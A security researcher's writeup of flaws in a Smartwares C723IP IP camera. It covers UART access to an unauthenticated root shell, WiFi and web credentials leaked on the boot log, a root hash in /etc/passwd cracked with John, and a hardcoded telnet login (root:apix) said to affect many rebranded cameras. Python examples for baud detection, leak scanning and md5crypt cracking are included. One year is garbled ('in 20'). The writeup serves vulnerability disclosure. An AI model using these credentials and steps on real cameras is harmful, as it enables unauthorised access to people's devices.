This is a writeup for some vulnerabilities that I found in the Smartwares C723IP Camera.
I’ve contacted the seller of this camera regarding my findings, but they didn’t respond. Enough time has passed that I feel it is appropriate to post this writeup.
Required Hardware:
- USB to TTL converter.
You can get these pretty cheap on amazon (~$7):
https://www.amazon.com/WINGONEER-CP2102-Module-Serial-Converter/dp/B01LRVQIFQ
If you don’t mind waiting a couple of weeks to receive it, you can order them on aliexpress for even cheaper (~$1):
https://www.aliexpress.com/item/1pcs-CP2102-module-USB-to-TTL-serial-UART-STC-download-cable-PL2303-Super-Brush-line-upgrade/32694152202.html
The Bus Pirate and the Attify Badge also work, although they are a fair bit more expensive due to their added compatibility with other protocols.
- A basic Phillips head screwdriver.
- x3 male to female jumper cables.
Required Software:
- baudrate.py
- screen
- JohnTheRipper
For this writeup, I’m going to be using the Attify badge. All the steps will be the same no matter which device you are using. In addition, I’m running all of the tools on an Ubuntu-based distribution.
Before taking the camera apart, I connected it to a test network and ran an nmap scan against it:
- 23/tcp open telnet security DVR telnetd (many brands)
- 80/tcp open http mini_httpd 1.21 18oct2014
- 554/tcp open rtsp
- 8081/tcp open blackice-icecap?
Looking up that version of mini_httpd shows that there are two buffer overflow vulnerabilities:
Fantastic start. But I want to keep looking.
There is also a telnet service running, which isn’t a documented feature. We’ll keep this in mind for later.
Casing removed, the camera looks like this:
To the left of the lens, right below the screw, there is a row of headers.
I’m interested in the top three of them, labelled RX, TX and GND.
TX = Transmitting
RX = Receiving
GND = Ground
The first step would normally be using a multimeter to determine which header is which, but thankfully the manufacturer of this camera labelled them for us. There are also holes for the pins, so soldering the jumper cables to the board isn’t really required here.
Make sure that the camera is unplugged from its power source before continuing.
Connect the TX on the camera to the RX on your adapter of choice from the above list. Repeat this for the camera’s RX to the adapter’s TX. Finally connect GND to GND.
You can now connect the adapter to the computer.
Confirm that the computer can see it by running “ls /dev/” and looking for “ttyUSB0” (the last few lines of dmesg will also name the node the adapter was assigned).
If you have multiple ttyUSB’s, unplug the adapter and run the command again, taking note of which one is removed.
Download the baudrate.py script and make it executable with “chmod +x baudrate.py”.
Running the script will automatically check for “/dev/ttyUSB0”. You can supply a different path with the -p argument if yours isn’t USB0.
With the script running, plug the camera into a power supply and within seconds you should be able to see output. If the text isn’t displaying properly, you can use the up and down arrows to change the baud rate.
In the case of this camera, a baud rate of 115200 worked for me.
During the boot, I noticed two more issues.
Both the WiFi PSK and the user-set credentials for the web panel are printed in plain text on the serial console, so anyone with physical access to the board can read them straight off the boot log:
- get user0:admin:password123:0
- user0:name:admin,passed:password123,leave:0
- ssid=testnetwork
- pass=supersecurepassword
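The two steps above, finding the rate at which the console decodes as text and then reading the boot log for leaked secrets, as an added Python example. This is not the baudrate.py script and not anything that ships with the camera. The heuristic is the one such tools rely on: at the right baud rate the stream is almost entirely printable ASCII, at a wrong rate framing errors turn it into high-bit garbage and stray control bytes. The boot log below is a constructed sample that reproduces the four lines quoted above; the capture_samples helper needs pyserial and a wired-up adapter, everything else runs offline.

```python
import re
import string

# Rates baudrate.py cycles through; 115200 is the one that worked on this camera.
COMMON_BAUD_RATES = (9600, 19200, 38400, 57600, 115200, 230400)

# Bytes a sane boot log is made of: printable ASCII plus console whitespace.
_TEXT_BYTES = frozenset(string.printable.encode("ascii"))


def text_ratio(sample: bytes) -> float:
    """Fraction of bytes that are printable ASCII or whitespace.

    At the right baud rate a UART stream is almost entirely text; at a wrong
    rate framing errors show up as high-bit garbage and stray control bytes.
    """
    if not sample:
        return 0.0
    return sum(1 for b in sample if b in _TEXT_BYTES) / len(sample)


def pick_baud(samples, threshold=0.9):
    """Return the rate whose sample looks most like text, or None if nothing
    clears the threshold (TX/RX swapped, camera not booting, ...)."""
    best_rate, best_score = None, 0.0
    for rate, sample in samples.items():
        score = text_ratio(sample)
        if score > best_score:
            best_rate, best_score = rate, score
    return best_rate if best_score >= threshold else None


def capture_samples(port, rates=COMMON_BAUD_RATES, seconds=2.0):
    """Read a short burst from the adapter at each candidate rate.
    Needs pyserial (pip install pyserial) and a camera printing to its console;
    imported here so the offline helpers above carry no dependency."""
    import serial
    samples = {}
    for rate in rates:
        with serial.Serial(port, rate, timeout=seconds) as ser:
            samples[rate] = ser.read(512)
    return samples


# Key names that should never appear next to a value in a boot log.
_SECRET_KV = re.compile(
    r"\b(pass(?:word|wd|ed)?|psk|wpa_psk|key|secret|token)\s*[=:]\s*([^\s,]+)",
    re.IGNORECASE,
)
# The camera's own account dump format: "get user0:<name>:<password>:<flag>".
_USER_LINE = re.compile(r"\buser\d+:([^:\s]+):([^:\s]+):\d+\b")
_SSID = re.compile(r"\bssid\s*=\s*(\S+)", re.IGNORECASE)


def find_leaks(capture):
    """Return (line number, kind, value) for every credential-looking item."""
    leaks = []
    for lineno, line in enumerate(capture.splitlines(), 1):
        for m in _USER_LINE.finditer(line):
            leaks.append((lineno, "web credential", f"{m.group(1)}:{m.group(2)}"))
        for m in _SSID.finditer(line):
            leaks.append((lineno, "wifi ssid", m.group(1)))
        for m in _SECRET_KV.finditer(line):
            leaks.append((lineno, "secret " + m.group(1).lower(), m.group(2)))
    return leaks


# Constructed sample: the four lines quoted above plus ordinary boot noise.
SAMPLE_BOOT_LOG = """\
U-Boot (constructed sample log)
Starting kernel ...
get user0:admin:password123:0
user0:name:admin,passed:password123,leave:0
ssid=testnetwork
pass=supersecurepassword
eth0: link up
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                  # e.g. python3 uart_triage.py /dev/ttyUSB0
        samples = capture_samples(sys.argv[1])
        rate = pick_baud(samples)
        print("baud rate:", rate)
        capture = samples[rate].decode("ascii", "replace") if rate else ""
    else:
        capture = SAMPLE_BOOT_LOG
    for lineno, kind, value in find_leaks(capture):
        print(f"line {lineno}: {kind}: {value}")
```

Run without arguments it triages the constructed log; with a device path it samples each rate for two seconds, so plug the camera in right after starting it, as the page does with baudrate.py. The key list in _SECRET_KV is deliberately short; extend it with whatever your target's firmware calls its secrets.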
Let’s see what else we can find.
Once you have the baud rate, you can close the script and run screen, supplying the device path and the baud rate. Run this as root as well (or add your user to the group that owns the device, usually dialout).
sudo screen /dev/ttyUSB0 115200
And boom, unauthenticated root shell on the camera!
If we check out /etc/passwd, we can see the root password stored as a salted MD5 hash, sitting in the world-readable passwd file itself rather than in /etc/shadow.
Let’s try to crack it using JohnTheRipper:
It took an entire 32 seconds to brute force on my laptop…
Such a secure password.
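What John is doing in that 32 seconds, as an added Python example that is not from the original writeup: the standard md5crypt ($1$) scheme reimplemented on top of hashlib, a parser that pulls hashes out of /etc/passwd (on a system that keeps them in /etc/shadow it returns nothing), and a dictionary attack that rehashes each candidate with the salt taken from the target. The passwd line, the salt bt9Tq4Pz and the wordlist are constructed; the hash is generated here from the recovered password apix, not copied from the camera.

```python
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """md5crypt's own base64 variant: 6 bits at a time, least significant first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: bytes, salt: bytes) -> str:
    """The $1$ md5crypt scheme (Poul-Henning Kamp's FreeBSD algorithm, what
    BusyBox/uClibc crypt() produces). Only 1000 MD5 rounds and no tunable cost,
    which is why a short password falls to a wordlist in seconds."""
    magic = b"$1$"
    salt = salt[:8]                      # the salt is at most 8 characters
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                 # mix in len(password) bytes of alt
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(password)
    while bits:                          # one byte per bit of the length
        ctx.update(b"\x00" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):                # fixed-cost stretching loop
        ctx1 = hashlib.md5(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    encoded = b""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return (magic + salt + b"$" + encoded).decode("ascii")


def hashed_accounts(passwd_text: str) -> dict:
    """{user: hash} for every /etc/passwd entry that carries a real hash.
    A hardened system returns nothing here: field 2 is 'x' and the hashes
    live in root-only /etc/shadow. This camera keeps them in world-readable passwd."""
    accounts = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] not in ("", "x", "*", "!"):
            accounts[fields[0]] = fields[1]
    return accounts


def crack_md5crypt(target: str, wordlist):
    """Dictionary attack: hash each candidate with the target's own salt."""
    _, tag, salt, _ = target.split("$", 3)     # '$1$<salt>$<hash>'
    if tag != "1":
        raise ValueError("not a $1$ md5crypt hash")
    salt = salt.encode("ascii")
    for word in wordlist:
        if md5crypt(word.encode("utf-8"), salt) == target:
            return word
    return None


# Constructed sample: the root hash is generated here from the recovered
# password "apix" with a made-up salt, not copied from the camera.
SAMPLE_PASSWD = "\n".join([
    "root:" + md5crypt(b"apix", b"bt9Tq4Pz") + ":0:0:root:/:/bin/sh",
    "daemon:*:1:1:daemon:/:/bin/false",
    "nobody:x:99:99:nobody:/:/bin/false",
])

# Toy wordlist standing in for john's default list.
WORDLIST = ["123456", "password", "admin", "root", "12345678", "apix", "qwerty"]

if __name__ == "__main__":
    for user, digest in hashed_accounts(SAMPLE_PASSWD).items():
        print(f"{user}: {digest} -> {crack_md5crypt(digest, WORDLIST)}")
```

The point of parsing passwd rather than shadow is the finding itself: any process on the camera, including the web server and RTSP daemon exposed on the network, can read the root hash. John does the same loop in optimised C with its own wordlist and rules; the pure-Python version is only meant to show that nothing in md5crypt slows an attacker down beyond the 1000 MD5 calls per guess.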
We can now telnet into the device as root with the newfound credentials root:apix:
When checking to see if these vulnerabilities were already disclosed, I found this post regarding a different vulnerability found in some WiFi cameras back in 2017:
It seems that Smartwares is one of many companies purchasing re-branded generic IP cameras from a manufacturer in China.
This post claims that over 1250 different camera models were vulnerable in 20, due to the same software running on all of them.
Since I only have this one camera, I am not able to confirm it, but it seems likely that these credentials would allow an attacker to telnet into a decent portion of cameras from this manufacturer.
I also plan on taking a look at the web interface and the app, but that will be for later.
If you have any questions or feel that I missed any helpful details, feel free to let me know!